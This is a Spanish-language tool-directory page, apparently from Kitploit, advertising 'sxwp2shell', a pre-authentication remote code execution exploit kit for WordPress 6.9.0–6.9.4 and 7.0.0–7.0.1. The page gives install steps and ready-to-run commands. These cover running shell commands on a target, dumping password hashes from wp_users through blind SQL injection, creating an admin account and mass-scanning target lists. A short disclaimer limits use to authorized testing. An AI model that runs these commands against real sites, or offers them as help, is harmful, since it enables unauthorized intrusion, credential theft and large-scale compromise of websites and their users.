Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/sentinelxofficial/sxwp2shell
Frameworks de Pruebas de PenetraciónEscáneres de VulnerabilidadesAnálisis de CódigoExplotaciónSeguridad Web
GitHubsentinelxofficial/sxwp2shell

sxwp2shell

WordPress wp2shell kit de explotación RCE (ejecución remota de código) sin autenticación previa (CVE-2026-63030 + CVE-2026-60137)

Ver Repositorio
1hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

/ / ____ / /()___ ___ / / | |/ / __ / _ / __ / / / __ / _ / / | / / / __/ / / / // / / / / / // | /_/_// //_/// //_/__//|_|

sxwp2shell — Exploit RCE pre-autenticación para WordPress mediante confusión de ruta batch en la API REST (CVE-2026-63030) + inyección SQL (CVE-2026-60137).

Afecta: WP 6.9.0–6.9.4 / 7.0.0–7.0.1


Instalación

root@kitploit:~
git clone https://github.com/SentinelXofficial/sxwp2shell
cd sxwp2shell
chmod +x sxwp2shell.py

Python 3.7+, solo biblioteca estándar — no se necesita pip install.

Uso

ComandoQué hace
check <url>Detecta versión, punto final batch, confusión de ruta y SQLi
exploit <url>Cadena RCE completa (SQLi → creación de admin → shell)
read <url>Extracción de datos por SQLi ciega
scan <archivo>Escaneo masivo de objetivos desde archivo, exporta CSV
root@kitploit:~
python3 sxwp2shell.py check https://target.com
python3 sxwp2shell.py exploit https://target.com --cmd id
python3 sxwp2shell.py read https://target.com --query "SELECT user_pass FROM wp_users"
python3 sxwp2shell.py scan targets.txt -o results.csv

Opciones

root@kitploit:~
--cmd CMD         Comando a ejecutar                 (por defecto: id)
--query QUERY     Consulta SQL personalizada
-k, --insecure    Omitir verificación SSL
--proxy PROXY     Proxy HTTP
--timeout SEG     Tiempo de espera de solicitud      (por defecto: 15)
--delay SEG       Retardo entre solicitudes
--agent AGENT     User-Agent personalizado
--no-color        Deshabilitar salida coloreada
-o, --output      Guardar resultados de escaneo en CSV

Aviso legal

Solo para pruebas de seguridad autorizadas. Lea DISCLAIMER.md.

Descargar herramienta